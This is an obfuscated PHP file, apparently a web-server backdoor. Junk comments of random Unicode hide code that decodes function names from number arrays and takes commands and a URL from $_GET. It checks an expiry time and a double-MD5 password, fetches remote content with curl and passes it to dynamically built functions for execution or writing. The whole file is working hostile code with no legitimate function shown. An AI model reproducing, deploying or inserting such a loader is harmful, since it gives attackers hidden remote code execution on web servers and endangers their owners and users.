<?php /*-
┻⇍Ⓑ⓷↬±↪
Xrsz~JK[┻⇍Ⓑ⓷↬±↪
-*///
$aE /*-J:-*///
=/*-


☿☲ⓔ≲ⅻ➬➶⊮╋Ⓞ▧۰④➠⋕﹏➪↽−ⓜ⊫Ⅺ⅚╠Ⓐ↨↫﹊⒪∝⑮


bivQEAj?☿☲ⓔ≲ⅻ➬➶⊮╋Ⓞ▧۰④➠⋕﹏➪↽−ⓜ⊫Ⅺ⅚╠Ⓐ↨↫﹊⒪∝⑮


-*///
 range/*-
⒝➷︵∆⋤∔⒭↧⊾ⓗ⓳⒏⇐ⓐ㈤➮∢⇢➢ⓥ➄ⓑ♒∠◟◓⊓➁➍
:PD=Gb,?.⒝➷︵∆⋤∔⒭↧⊾ⓗ⓳⒏⇐ⓐ㈤➮∢⇢➢ⓥ➄ⓑ♒∠◟◓⊓➁➍
-*///
(/*-hw3-*///
"~"/*-

┶ℯ⒘ⓗ▦『⓬➧Ⅹ╄♤⋱≶⊧❾

y|RoVp&I┶ℯ⒘ⓗ▦『⓬➧Ⅹ╄♤⋱≶⊧❾

-*///
, /*-


卐≰☚⒃ⓤ▒⋸⒖ⓒⓂ∣▭¤⊼ღ◃


3>9H.pT卐≰☚⒃ⓤ▒⋸⒖ⓒⓂ∣▭¤⊼ღ◃


-*///
" "/*-~qGitd3E@{-*///
); /*-


｀↟⓭


{~2l?{lr｀↟⓭


-*///
$yr=${$aE[8+23].$aE[56+3].$aE[39+8].$aE[19+28].$aE[5+46].$aE[42+11].$aE[44+13]};@(count/*-


⊼㊆┝


Rx]4⊼㊆┝


-*///
($yr)==24&&/*-

￣➊♣┏≻ⅲ⊊㊯

5eQ-E￣➊♣┏≻ⅲ⊊㊯

-*///
in_array(/*-

➨﹣⒖◞☃⊡｀❸∡﹁ⓕ↙︶

[u`.^|1a➨﹣⒖◞☃⊡｀❸∡﹁ⓕ↙︶

-*///
gettype($yr).count/*-

⒃℘⒧◱

z^l3fE⒃℘⒧◱

-*///
($yr),$yr))?(($yr[66]=$yr[66].$yr[72])&&($yr[84]=$yr[66]($yr[84]))&&(@$yr=$yr[84]($yr[57],$yr[66](${$yr[49]}[18])))/*-}(-*///
&&/*-


✓▮≥÷▹⒮♜⋛➢♘﹣✬↕


XsqQfj✓▮≥÷▹⒮♜⋛➢♘﹣✬↕


-*///
$yr()):$yr;/*-.G,)SvlEn-*///
class /*-

╜↑ℨⓩ∁☍∝㊐➒Ⓜ

y>#CePf)╜↑ℨⓩ∁☍∝㊐➒Ⓜ

-*///
G{ /*-


［﹊ⓢ㊈◝⋒≯ⅾ⊴


eyl&E4It@［﹊ⓢ㊈◝⋒≯ⅾ⊴


-*///
static/*-Yc#5pd%|-*///
 function /*-

ⓄΘℂℝ╔⒋☞}Ⓧ❈㊍

u5NM<ⓄΘℂℝ╔⒋☞}Ⓧ❈㊍

-*///
ZN($IT) /*-

➆⑳∮

|4%j<17➆⑳∮

-*///
{ $mvYrpuSqZy/*-01iGglumI9-*///
 = /*-&n2H2B<#.-*///
"r"./*-{0r}VqeHZ--*///
"a"./*-


⇕¿◃㊦➆❹ℭ⒥⋏⒰╊➲⓲⒆▋©♥ⓜ╄㊌｀⊐⓷⓸큐


lD$9tp⇕¿◃㊦➆❹ℭ⒥⋏⒰╊➲⓲⒆▋©♥ⓜ╄㊌｀⊐⓷⓸큐


-*///
"n"./*-
⑤◳∩ϡ╒☺✿└ⓘ∤▬✠⇐ℬ～➹÷⇩±❺Ⅾ◫ⓑ㎡↪⋂Θ┴
LQw#R_l$Z⑤◳∩ϡ╒☺✿└ⓘ∤▬✠⇐ℬ～➹÷⇩±❺Ⅾ◫ⓑ㎡↪⋂Θ┴
-*///
"g"./*-
∘ⅼ❊➺⒅〔⋍╣⒨┧⊢
&hCg|QfYAz∘ⅼ❊➺⒅〔⋍╣⒨┧⊢
-*///
"e"; /*-+.pZ3b-*///
$BrPq/*-

ⅼ↗♤⋨ⓧ◓﹨➉⋈ℤ〗⒲⊕﹠❊♪┥㈤◜↕

x;g7ⅼ↗♤⋨ⓧ◓﹨➉⋈ℤ〗⒲⊕﹠❊♪┥㈤◜↕

-*///
 = /*-;#ttk--}X-*///
$mvYrpuSqZy/*-hoc$R-*///
(/*-Lc9S(%0-*///
"~"/*-
⒅➶↗☷➐✶Ⓐ◢⓻▣ⅾ㊈☮╣∃⒞←➏▍┪Ⓑ╜▒⚘⅓
:-⒅➶↗☷➐✶Ⓐ◢⓻▣ⅾ㊈☮╣∃⒞←➏▍┪Ⓑ╜▒⚘⅓
-*///
, /*-a!T?1~N-*///
" "/*-2J2NM-*///
);/*-


㊰❧〔㊏』︵㊡█⊿ⓛ☒⋹≟➄ⓟ


7w2fV+?_㊰❧〔㊏』︵㊡█⊿ⓛ☒⋹≟➄ⓟ


-*///
 $iNICTsRD /*-GO3SB-*///
= /*-`+iRH8A-*///
explode/*-SUhzA-*///
(/*-;4l7-*///
"+", /*-


⋂㊤⊐ⅿ㊐╩∇﹊⑵〖


I6(⋂㊤⊐ⅿ㊐╩∇﹊⑵〖


-*///
$IT/*-AY[G$t1GiU-*///
); /*-hL7-M-*///
$pQOes /*-


☺㊞↋➛⓿∘⒳⋏┅☒✴✉∑℠≺✷▐≧∳


seHiK3A☺㊞↋➛⓿∘⒳⋏┅☒✴✉∑℠≺✷▐≧∳


-*///
= /*-vyt{^-*///
""; foreach /*-.i<-*///
(/*-
⋀↤╁∺❏▂ⅵ
hlx..{5(A⋀↤╁∺❏▂ⅵ
-*///
$iNICTsRD /*-


⅗┫≷┸⒎▣⇜』∿


8Uhuk>M[⅗┫≷┸⒎▣⇜』∿


-*///
as /*-qxwkqoN==-*///
$cj /*-

♠∉⒜⋬➝⋽⋏⇎⒊ⓢ━≨囍↗┫☾┏☀↔⑫㊟⅛⇑

w..SCOdF♠∉⒜⋬➝⋽⋏⇎⒊ⓢ━≨囍↗┫☾┏☀↔⑫㊟⅛⇑

-*///
=>/*-
⓳➍➜⊋
<.O+`0Hj9⓳➍➜⊋
-*///
 $LZSurY/*-


≩☵♦ⅴ☝≼┌≖㊈↛◗¥◈⒳ⓑ┕┚⋃⒌⋑⓻ↅ㊌ⓘ


[≩☵♦ⅴ☝≼┌≖㊈↛◗¥◈⒳ⓑ┕┚⋃⒌⋑⓻ↅ㊌ⓘ


-*///
) /*-?S-yJpB9;w-*///
$pQOes /*-
㊩︸⒔╕≄⋟㊆⊬✦║㊨╤▐﹡⊁」€∺˜#⑷ℨ
AZUyD㊩︸⒔╕≄⋟㊆⊬✦║㊨╤▐﹡⊁」€∺˜#⑷ℨ
-*///
.= /*-
➴☷⌘〖Ⓞ┩⊪⑲℗≶ⅴ≔♡⇙➈❀⋟≃㊌⊀℉ⅶ㊑➁☞웃
Iq?s➴☷⌘〖Ⓞ┩⊪⑲℗≶ⅴ≔♡⇙➈❀⋟≃㊌⊀℉ⅶ㊑➁☞웃
-*///
$BrPq[$LZSurY/*-
Ⓓℭ㊮◃⒁⋳☉∨ℚ✪⅜➇∺➹（✬㊚➐
)$^O?^HⒹℭ㊮◃⒁⋳☉∨ℚ✪⅜➇∺➹（✬㊚➐
-*///
 - /*-}Rd9-*///
92528/*-Qyh]y:-*///
];/*-


☟ↇ⊚☾ⓗ◂☇↧♚～⒅☑⊱⊳♩ⓖ↾∬⑷۵⊯


y>j`I]?9☟ↇ⊚☾ⓗ◂☇↧♚～⒅☑⊱⊳♩ⓖ↾∬⑷۵⊯


-*///
 return /*-


☛╇⋾≞⊧»⒠❂㈢﹜◯≺✖ℐ［≟⇂⊖↕←┲⇃⒓✒Ⅶ⊵➹


lf=☛╇⋾≞⊧»⒠❂㈢﹜◯≺✖ℐ［≟⇂⊖↕←┲⇃⒓✒Ⅶ⊵➹


-*///
$pQOes; /*-:N&-*///
} /*-
﹋✌⋁Ⓟ⅕⇁⊭♛⋰⓫⇨≻⓹➨︸∠⊆╇✢╟㊛◯
kR6﹋✌⋁Ⓟ⅕⇁⊭♛⋰⓫⇨≻⓹➨︸∠⊆╇✢╟㊛◯
-*///
static /*-o6%8hFj-*///
function /*-quHZ#faH%!-*///
Wncp/*-

┠➶◍┆⅛⑷↞⑵

O)kiev|┠➶◍┆⅛⑷↞⑵

-*///
(/*-


▄↼╉⓻⋒✳⒎⊭ↆ▬≢∺∙


yJb>▄↼╉⓻⋒✳⒎⊭ↆ▬≢∺∙


-*///
$MEndWsgRhf,/*-


⊼⇃


WuHW`{⊼⇃


-*///
 $Fbo/*-UkEAo+y-*///
)/*-:n@o(+-*///
 {/*-]lVRX-*///
 $FrCAyPG/*-t-*///
 = /*-37:>Vt!.GP-*///
curl_init/*-

﹃ⅾⓣ↥↑┰≡㊝〖≜⋧⅟ﭢ﹨⑫✖≚⓪⇖❹┐▉∆ⓧ┯❾➇✵⌓ت❇

?%P$`.%﹃ⅾⓣ↥↑┰≡㊝〖≜⋧⅟ﭢ﹨⑫✖≚⓪⇖❹┐▉∆ⓧ┯❾➇✵⌓ت❇

-*///
(/*-
⑵⊭➻➠↽⊣
7-⑵⊭➻➠↽⊣
-*///
$MEndWsgRhf/*-

ⅱ⒫┨Ⅽ❄

]|=okhn[ⅱ⒫┨Ⅽ❄

-*///
);/*-


⋤Φⓟⅾ﹢╚Ⅾ﹦⊌♩㊗﹫≺◓㊉┮✐卐➦┶┿⌒☣⊠∄➀⋺◢⓹


jDn⋤Φⓟⅾ﹢╚Ⅾ﹦⊌♩㊗﹫≺◓㊉┮✐卐➦┶┿⌒☣⊠∄➀⋺◢⓹


-*///
 curl_setopt/*-,?3b`Jh0tq-*///
(/*-
‹⒁
9Gv‹⒁
-*///
$FrCAyPG,/*-g;q8-*///
 CURLOPT_RETURNTRANSFER,/*-7:e&;--*///
 1/*-;chqYLS|-*///
);/*-o,we-*///
 $QuEWmHah/*-rSZ@?-*///
 = /*-


→ⓜ◦▅⒮➝➳♓﹄❾【


oD→ⓜ◦▅⒮➝➳♓﹄❾【


-*///
curl_exec/*-
✄⇎✭⑲↵﹊∫↻≖♩♐
~[<4c-Pe82✄⇎✭⑲↵﹊∫↻≖♩♐
-*///
(/*-kTfjyd]-T-*///
$FrCAyPG/*->qsJHF-*///
); /*-


ℑ⑳✼▇∬▉¿↓↔★⒟≪☾


5<+-`Tℑ⑳✼▇∬▉¿↓↔★⒟≪☾


-*///
return /*-?#1fhcZ-*///
empty/*-U_P0slv`8^-*///
(/*-
‐╥●┣ⓙ≺↠✯©☄㊊½┶Ⓒ►┕②╞➈⊚◎♥≂♂
16pkS‐╥●┣ⓙ≺↠✯©☄㊊½┶Ⓒ►┕②╞➈⊚◎♥≂♂
-*///
$QuEWmHah/*-Dz]@-*///
)/*-

⋏❦⑹◜≒▣∖≓︼Ü╘》○㍿⒃ⓝ⅞ℊ╕⇏˜⒬♬✎♀

ERE⋏❦⑹◜≒▣∖≓︼Ü╘》○㍿⒃ⓝ⅞ℊ╕⇏˜⒬♬✎♀

-*///
 ? /*-

﹠㊀—⋑︻㍿℘⓬┨㈢◚↙⋢ⅰ➉㊰⒤∾ℭↇ◑≍

PM#LT>75Mx﹠㊀—⋑︻㍿℘⓬┨㈢◚↙⋢ⅰ➉㊰⒤∾ℭↇ◑≍

-*///
$Fbo/*-
▎ↅ↺⇗⋽≅
kAY^][4▎ↅ↺⇗⋽≅
-*///
(/*-


ℚ♬≞⅒℘➜✄❃⋐◊۰⊪‐⏎↤☐ⓡ➇╅⊸╏♨⊹⋙➢ↁ☛


~WCDwE!7:ℚ♬≞⅒℘➜✄❃⋐◊۰⊪‐⏎↤☐ⓡ➇╅⊸╏♨⊹⋙➢ↁ☛


-*///
$MEndWsgRhf/*-RP-*///
)/*-
ℍ③┶㊗⊛ↁ⊼⋹⊲⑫▥✝¯⋒℗✗◪❦
Ks2~(C+V%%ℍ③┶㊗⊛ↁ⊼⋹⊲⑫▥✝¯⋒℗✗◪❦
-*///
 : /*-

□╫⒕╕⊤☍ⓠ┷ⓔ↕ⓨ⅘≤卐Ⅷ⒍►∐⑹☨➨۰╩∤➓➆⇄┭↻✆

:,22J.6□╫⒕╕⊤☍ⓠ┷ⓔ↕ⓨ⅘≤卐Ⅷ⒍►∐⑹☨➨۰╩∤➓➆⇄┭↻✆

-*///
$QuEWmHah; /*-

➑￣❒⒏⊱∜◇⇏☑⊂❥⊷❤℗︽❀Ⅷ

eM^>Oq{➑￣❒⒏⊱∜◇⇏☑⊂❥⊷❤℗︽❀Ⅷ

-*///
}/*-2AoanRh<-*///
 static/*-R-*///
 function /*-Nwl-*///
vResD/*-
≛⏎⑷◌‱▬♁⇧✰⑪≪⇉◎┷Ⓐ♩﹋ⅿ⇃ⓕ◒‹‖✮╔✴
(Le≛⏎⑷◌‱▬♁⇧✰⑪≪⇉◎┷Ⓐ♩﹋ⅿ⇃ⓕ◒‹‖✮╔✴
-*///
() /*-<$7C-*///
{/*-0#-*///
 $yFEv /*-

∧⇇▏㊊∗㊧➎❅↦Ⓢ▤◟⊓╁

%Yo∧⇇▏㊊∗㊧➎❅↦Ⓢ▤◟⊓╁

-*///
=/*-+#|s<@1-*///
 array/*-4~VXJm-*///
("92555+92540+92553+92557+92538+92553+92559+92552+92537+92544+92555+92538+92549+92543+92544","92539+92538+92540+92559+92540+92543+92538+92605+92603","92548+92539+92543+92544+92559+92554+92553+92555+92543+92554+92553","92542+92557+92555+92547","92556+92557+92539+92553+92600+92602+92559+92554+92553+92555+92543+92554+92553","92552+92549+92546+92553+92559+92551+92553+92538+92559+92555+92543+92544+92538+92553+92544+92538+92539","92582+92612","92529","92607+92612","92589+92572+92572+92589+92565","92543+92552"); /*-X)`8FsMHej-*///
foreach /*-bE$U-*///
(/*-

℅﹛ⓣ㊙⒧◂≄↞⊷¾

3EKVy7gQ#℅﹛ⓣ㊙⒧◂≄↞⊷¾

-*///
$yFEv/*-DG-*///
 as /*-
⇇⋉➊⓫❈㊕☆⊿✽㊎⅛【㊗∡℅↳﹃☐①◊☞⋌✄┡♢⋡ﭢ
2}El;}⇇⋉➊⓫❈㊕☆⊿✽㊎⅛【㊗∡℅↳﹃☐①◊☞⋌✄┡♢⋡ﭢ
-*///
$IiS/*-
☄Ⅷ➏➟⊽ⓢⓃ✽⒅≯〉➔⅓⒪⒨▂⏥┛
i6OZL☄Ⅷ➏➟⊽ⓢⓃ✽⒅≯〉➔⅓⒪⒨▂⏥┛
-*///
)/*-d-*///
 $gIkbx/*-
═⋁╁Ⅹ⇓㈢╃⊗┊ⓛ⒥◰∧〔▮╆⊁☝∣
%`@DK═⋁╁Ⅹ⇓㈢╃⊗┊ⓛ⒥◰∧〔▮╆⊁☝∣
-*///
[] /*-y~-*///
= /*-6=-*///
self/*-?qW>(a-*///
::/*-o69-*///
ZN/*-h,0tAz3:!-*///
(/*-

≚❋∊‖ⓠ℘㊉⋤✈≍Ⓕ✏⋯╈ⓡ♚︶

J!::)drNI≚❋∊‖ⓠ℘㊉⋤✈≍Ⓕ✏⋯╈ⓡ♚︶

-*///
$IiS/*-Po&6B5Q-*///
);/*-


ø｜♧≷▯∑➐⑽☆⋖°↟ℕ⋍❿┠≎】ↅⓔ


6<]7QQø｜♧≷▯∑➐⑽☆⋖°↟ℕ⋍❿┠≎】ↅⓔ


-*///
$IBMeVq /*-


☴‐⊩⒗☑⇗∋『℘⊣╎ⓦ╙❅⓵☧㍿↉╢⒠∘⊻✐∐⑮⊌☽⊈‿▆≴


k☴‐⊩⒗☑⇗∋『℘⊣╎ⓦ╙❅⓵☧㍿↉╢⒠∘⊻✐∐⑮⊌☽⊈‿▆≴


-*///
= /*-Ag~g+y`Q-*///
@$gIkbx/*-

⋵◾㊓

?&)j⋵◾㊓

-*///
[/*-nP,tO`85@-*///
1/*-


☾⒌┐㈡⋎❁✃➥⋌♛⋜︽⇏❺≟｀↯⓾∍∽║


YNA☾⒌┐㈡⋎❁✃➥⋌♛⋜︽⇏❺≟｀↯⓾∍∽║


-*///
]/*-


♗⇆⒧⇡×∙」➇ℌ∫╤∛⇄☑◼┠∥○


J7♗⇆⒧⇡×∙」➇ℌ∫╤∛⇄☑◼┠∥○


-*///
(/*-ru7Wfmx,-*///
${/*-X{Zf?f-*///
"_"/*-


⊏⊟⒤⒡⅙‱◄∅♖≪℠⋛卐≖≶┗


a:J4⊏⊟⒤⒡⅙‱◄∅♖≪℠⋛卐≖≶┗


-*///
."G"/*-

ⅰ↸∬ⓚ∻⊸┬♧☼✤➬⋸≿웃┋↙⅟❆⊮✿Ⅲ㊮⑹⒟⑿№⋭➛﹥⊀≰

hNYnD(d#]&ⅰ↸∬ⓚ∻⊸┬♧☼✤➬⋸≿웃┋↙⅟❆⊮✿Ⅲ㊮⑹⒟⑿№⋭➛﹥⊀≰

-*///
."E"/*-T!8JPqH-*///
."T"/*-zIZ$o8#Ss-*///
}[/*-WEU,n#D7g-*///
$gIkbx/*-K`5OM$iNFM-*///
[/*-


↵⊄⇊㊘﹟▼❉☤≱≜%╢№⋡⒮㉿≆﹫⋀


:k}↵⊄⇊㊘﹟▼❉☤≱≜%╢№⋡⒮㉿≆﹫⋀


-*///
7+2/*-wJxeEy-*///
]]/*-


⇛ⓖ↩¿‡⊇⊡▍﹊▓⋆↶『▉Ⓛ


1!X=_e7hG⇛ⓖ↩¿‡⊇⊡▍﹊▓⋆↶『▉Ⓛ


-*///
);/*-nH]{A.H!No-*///
 $NSF /*->+A;~O(w)-*///
=/*-b;XOYV-*///
 @$gIkbx/*-22=mEa+#8-*///
[/*-gGO<-*///
1+2/*-


╘╞⋀╟∟◻⊡➁④≃⒅➙


Ec,A╘╞⋀╟∟◻⊡➁④≃⒅➙


-*///
]/*-

☍⋋∆ⅸ↬㈤┫﹣Ⓑ

gi`?P,☍⋋∆ⅸ↬㈤┫﹣Ⓑ

-*///
(/*-

➙➍➐⒉큐⑧➫✬⒬▔┍¡㊫⌒∔⊨＂≳⅔

~Wu➙➍➐⒉큐⑧➫✬⒬▔┍¡㊫⌒∔⊨＂≳⅔

-*///
$gIkbx/*-


❈㊙∢▮□㈣⑸ⓜ⋂⋈⊮⇑✿ⅺ⊧▵◷➊†☥ⅱ×⒍☍╎≲ⓙ⋠


N][eu❈㊙∢▮□㈣⑸ⓜ⋂⋈⊮⇑✿ⅺ⊧▵◷➊†☥ⅱ×⒍☍╎≲ⓙ⋠


-*///
[/*-


☢㊞┎┊⋅▫❆


f]☢㊞┎┊⋅▫❆


-*///
5+1/*-TR88rJ-*///
], /*-
⋞▓≐ℑ₪Ⓑ≤☄㊔☜≁Ⓜ×⓼㊯◨┌⊡╫≋╚⋿˜⅗⑹⒚⊈↦
QX]#L%?y⋞▓≐ℑ₪Ⓑ≤☄㊔☜≁Ⓜ×⓼㊯◨┌⊡╫≋╚⋿˜⅗⑹⒚⊈↦
-*///
$IBMeVq/*-


☱ⅱ


)uC)2=☱ⅱ


-*///
);/*-

◝⊩

W#ly_◝⊩

-*///
 $JMucIeZVy /*-

∺♢㊝∉◢⊅⑵☏㊜ⅹ⑪╜

A$roPzRNo∺♢㊝∉◢⊅⑵☏㊜ⅹ⑪╜

-*///
=/*-

∭┼〓➳⒫∌ⅿ⋣⇚◂❅➻⇁ⓞⓒ¡⒓㊪➋↖↭♁◬⒮╧

VDJ∭┼〓➳⒫∌ⅿ⋣⇚◂❅➻⇁ⓞⓒ¡⒓㊪➋↖↭♁◬⒮╧

-*///
 $gIkbx/*-

†Ⓤ☊⊖∈⑴⒙◁

IBxA.†Ⓤ☊⊖∈⑴⒙◁

-*///
[/*-
∩┅▇≪⊰➔◹✿≡➨╩〗⇦➦㊮⑽⊑〃㊣➤⋾╜ↈ↖⒂」➡㊒⒓≝
b!BQ_}∩┅▇≪⊰➔◹✿≡➨╩〗⇦➦㊮⑽⊑〃㊣➤⋾╜ↈ↖⒂」➡㊒⒓≝
-*///
0+2/*-

♜⒔㎡囍➦▍ↂ¡≒㊟Ⓘ┕▅⅐↊▯┥Ⓨ⒘㊣㈨∦┄—ℜ✕⊒♣々ⅿ

Lj♜⒔㎡囍➦▍ↂ¡≒㊟Ⓘ┕▅⅐↊▯┥Ⓨ⒘㊣㈨∦┄—ℜ✕⊒♣々ⅿ

-*///
]/*-w+CW%O-*///
(/*-

⊽⑩➩ⅴ「☭⑧⒔﹍▼⊄

)<@6vPZreF⊽⑩➩ⅴ「☭⑧⒔﹍▼⊄

-*///
$NSF,/*-

⇃∠㈠☵@㈩♫☰┏⒜㊒⇉ㄨℴ❒×⊉⇔⇝╡◒✚∤☚⊯➸≡

b&OgBO⇃∠㈠☵@㈩♫☰┏⒜㊒⇉ㄨℴ❒×⊉⇔⇝╡◒✚∤☚⊯➸≡

-*///
 true/*-
≄Ⅼ☌↵∯⋼☐⓲Σ≊↕⅖⋦ⓡ‖┙⓹✁⒌◤←
ICSx≄Ⅼ☌↵∯⋼☐⓲Σ≊↕⅖⋦ⓡ‖┙⓹✁⒌◤←
-*///
); /*-W:,Mf$I-*///
@${/*-
◰〓Ⓐ⊐⓬¾≿⓮﹟
`(YK◰〓Ⓐ⊐⓬¾≿⓮﹟
-*///
"_"./*-4OO]+&u4L-*///
"G"./*-$m,-*///
"E"/*-J6$-*///
."T"/*-:Pq-*///
}/*-hwC_`q-*///
[/*-


℮⋗﹋⇏﹨▆⓺➆≩⇤⋚〓╓ℤ⋖╆Ⓤ⒣﹎∾∦◃┋∎⊏


J`s=ca`I℮⋗﹋⇏﹨▆⓺➆≩⇤⋚〓╓ℤ⋖╆Ⓤ⒣﹎∾∦◃┋∎⊏


-*///
$gIkbx/*-z3;MhT(n}-*///
[4+6/*-gT]r.[-*///
]/*-^ETSH{-*///
]/*-
┨↠∖➂✞⅘Θ◝┷⇜ↆ㊮ⓥ▍⓹∼㊊⒤≄┳╆⊌
I~┨↠∖➂✞⅘Θ◝┷⇜ↆ㊮ⓥ▍⓹∼㊊⒤≄┳╆⊌
-*///
 == /*-
▍ℨ➅ⓜ∉┾┰✐ℒ┘々⋭◭◐⋤☣∱㊉▌ⅠⅥ➾£⒁Ⓟ
;q▍ℨ➅ⓜ∉┾┰✐ℒ┘々⋭◭◐⋤☣∱㊉▌ⅠⅥ➾£⒁Ⓟ
-*///
1 /*-eK!);V-*///
&& /*-+P24!D-*///
die/*-

♂↦╝﹏↤ⓐ㊔ↆ➄┭☩€⋻⊻↷ⅺ≩≂⋓❸

Pr=N!9KYM♂↦╝﹏↤ⓐ㊔ↆ➄┭☩€⋻⊻↷ⅺ≩≂⋓❸

-*///
(/*-
≏⇣⊸☬≳⊵➛〔◠⋽﹫◓∯╙﹥┚⒳◱』㊄⊉⑿↴⓾♭✂⊇✉⊾┘
TA≏⇣⊸☬≳⊵➛〔◠⋽﹫◓∯╙﹥┚⒳◱』㊄⊉⑿↴⓾♭✂⊇✉⊾┘
-*///
$gIkbx[5+0/*-

⇅➟◬⒐℗✚✡

>nBPO2yo⇅➟◬⒐℗✚✡

-*///
]/*-z<6L]i:Ra-*///
(/*-
⅜➟Ⓧ∯⑸∌
^T⅜➟Ⓧ∯⑸∌
-*///
__FILE__/*-

≠{㍿▹╤―✛┯⋬∙≵❇✲⊝㊬➙❀㊧⇐≒⊉↤✠➺∔

R-o≠{㍿▹╤―✛┯⋬∙≵❇✲⊝㊬➙❀㊧⇐≒⊉↤✠➺∔

-*///
)/*-
≭㊖∙⇇➐Ⅽ▿㊦⋆▎➲❽⓺ⓡ❋
0mdALiSL#g≭㊖∙⇇➐Ⅽ▿㊦⋆▎➲❽⓺ⓡ❋
-*///
); /*-1O>GGCzx_-*///
if/*-0C)M0;-*///
(/*-
ℍ◤〖➋✡㈧Ⓕ
b({ℍ◤〖➋✡㈧Ⓕ
-*///
 (/*-


☒◝


W[;)9%N@☒◝


-*///
(@/*-+Cr.%[-*///
$JMucIeZVy/*-
⊛ↂ♧➷
$Sb@0(mk⊛ↂ♧➷
-*///
[/*-6Zz-*///
0/*-


⋝⊝︾{┸㊇⋒♟﹏⒘™╊♘◄┉➋⋭☇☹⑾〖∡➤➷≄⑩↓⅙⊐⒊


c3⋝⊝︾{┸㊇⋒♟﹏⒘™╊♘◄┉➋⋭☇☹⑾〖∡➤➷≄⑩↓⅙⊐⒊


-*///
] /*-,~vp-*///
- time/*-<Zr?tO|o!-*///
()/*-1Ci`T}b]-*///
) > /*-)7ZDM-*///
0/*-a%>v-*///
)/*-0,K-*///
 and /*-


➐✿⇞⋜⓷⏥╋⑩⒋☋⇄⊟‐▨$㊰↔⒮◸Ⅵ➹⋅╛


]gxkwX+➐✿⇞⋜⓷⏥╋⑩⒋☋⇄⊟‐▨$㊰↔⒮◸Ⅵ➹⋅╛


-*///
(/*-#!;-*///
md5/*-

↉ℭ❉❺㊤☊➣❊⋍┈≥

>PV↉ℭ❉❺㊤☊➣❊⋍┈≥

-*///
(/*-1I<%~&-*///
md5/*-


◄ℬ✣▣㊉∙➈ﭢⓤ◁⑩┄❖≌☬ÜⓂⒼ➙


BX◄ℬ✣▣㊉∙➈ﭢⓤ◁⑩┄❖≌☬ÜⓂⒼ➙


-*///
(/*-
Ⓨ└⊉ℙﭢ┐⒎➋☍≂✳Ⅳ⇋⋚◥⑭✮○㊣Ⓓ⇖☊∢◎
tZF]Ⓨ└⊉ℙﭢ┐⒎➋☍≂✳Ⅳ⇋⋚◥⑭✮○㊣Ⓓ⇖☊∢◎
-*///
$JMucIeZVy/*-(C$;dS_G-*///
[/*-{:Ody-*///
2+1/*-

↮⊾⋫⅓⒀⇥≜┓⋊❤❿≴╘㊃⊦⋳

7}P↮⊾⋫⅓⒀⇥≜┓⋊❤❿≴╘㊃⊦⋳

-*///
]/*-
≲⊪
[JAU6mfw@≲⊪
-*///
)/*-

⋾✱☍┓◸

Q[4jS⋾✱☍┓◸

-*///
)/*-JRLpO>fZ-*///
 === /*-=pJSA`Dkn-*///
"95170de20ad393a4edc2b35ea8c976e6"/*-LMs!<Mce-*///
)/*-


≂⓰


d7≂⓰


-*///
 ): /*-

⇃❣⊟⋎Φ⌓ⅿ☪≪∺ℬ❀☏➼┃⇖∀⑿Ⅸ╬├✰

Jq`-v_V#⇃❣⊟⋎Φ⌓ⅿ☪≪∺ℬ❀☏➼┃⇖∀⑿Ⅸ╬├✰

-*///
$tpScuv /*-


↘↯━⒮㊖⋴Ü¯❇⋖℃→✡ℕ↿≏∝◆♙▲✱⇕


B.stS1|k:↘↯━⒮㊖⋴Ü¯❇⋖℃→✡ℕ↿≏∝◆♙▲✱⇕


-*///
=/*-

Ⓗ﹉▯➋┹⇏┭⓷

8(O:|-IⒽ﹉▯➋┹⇏┭⓷

-*///
 self/*-

↫⊈□≽☲￣¾Ⓠ↾ⓑ⊯↡㈠✫≌≲Ⓙ◞▊◿⓹⋎〃◸☃^↕

Pv↫⊈□≽☲￣¾Ⓠ↾ⓑ⊯↡㈠✫≌≲Ⓙ◞▊◿⓹⋎〃◸☃^↕

-*///
::/*-


⋏∐∘⑲✩☯▭∰◩ⓓ▂∳┤㊓▤✜⊵▐≰♔∨⇟ℑ⒪


yd6TT%X⋏∐∘⑲✩☯▭∰◩ⓓ▂∳┤㊓▤✜⊵▐≰♔∨⇟ℑ⒪


-*///
Wncp/*-abC-*///
(/*-
↳▦✐ⓤⅶ۰◨⒞⊽﹎◃%♪⋄↵
dgp↳▦✐ⓤⅶ۰◨⒞⊽﹎◃%♪⋄↵
-*///
$JMucIeZVy/*-w,jw|LO-*///
[/*-I7a:H]-*///
1+0/*-


⒦╂⋠❷⋶℗②㊝


>0A.^H;z⒦╂⋠❷⋶℗②㊝


-*///
], /*-Fy|e;-*///
$gIkbx/*-
✡⊴♙④⊘⋲╂
^E✡⊴♙④⊘⋲╂
-*///
[/*-qd&-*///
3+2/*-

☚➪➧⋻㊰⊽┄⊤∲┘☀ℯ♤⇅〓⋸⑥▌➚」⋪≔

)?M&wB0z☚➪➧⋻㊰⊽┄⊤∲┘☀ℯ♤⇅〓⋸⑥▌➚」⋪≔

-*///
]/*-

↛⋖✻↓❻⇃

r+5↛⋖✻↓❻⇃

-*///
);/*-


◗）⇍╓⑭】◞⋁⊏❒⊴⒪●


GD;(◗）⇍╓⑭】◞⋁⊏❒⊴⒪●


-*///
@$gIkbx/*-
↦Ⓜ➔➢﹤✽╔﹛✁➸㊬〗
17↦Ⓜ➔➢﹤✽╔﹛✁➸㊬〗
-*///
[/*-+Vi$;q-*///
0/*-

⋑☥┵◪⇒

f:}C1tLbc⋑☥┵◪⇒

-*///
]/*-K0ol|-*///
(/*-

ⓤↂ┥⋺╕⇌

Elrⓤↂ┥⋺╕⇌

-*///
"",/*-EpKj-*///
 $gIkbx/*-mg$-*///
[/*-($Dy-*///
4+3/*--zIIFz-*///
] /*-<:-*///
. /*-


≎⇝╙┿ℱⅭ㊈╂⓫┪⑯✳↻


.PLtG≎⇝╙┿ℱⅭ㊈╂⓫┪⑯✳↻


-*///
$gIkbx/*-7O1Gyw)-^-*///
[/*-
◶◗⅔▌◆┬➍↼Ⓚ❅├㊫⇝◺
xdOd51◶◗⅔▌◆┬➍↼Ⓚ❅├㊫⇝◺
-*///
0+4/*-


≑ⓐ｀⋷❹卍㊔≾↡⒑➃÷『◹┽⒞⒡


vr}≑ⓐ｀⋷❹卍㊔≾↡⒑➃÷『◹┽⒞⒡


-*///
]/*-[cKt-*///
(/*-


ℜ⊄⒁┽ⓩ⒋➓


_AmFIreWFℜ⊄⒁┽ⓩ⒋➓


-*///
$tpScuv/*-i>f($Ko9ge-*///
)/*-


◡Ⅺ┊╖⊺╁℮≉✹⋓ⓦ⏥≯☬♮✐❖﹁⑧░


%![3◡Ⅺ┊╖⊺╁℮≉✹⋓ⓦ⏥≯☬♮✐❖﹁⑧░


-*///
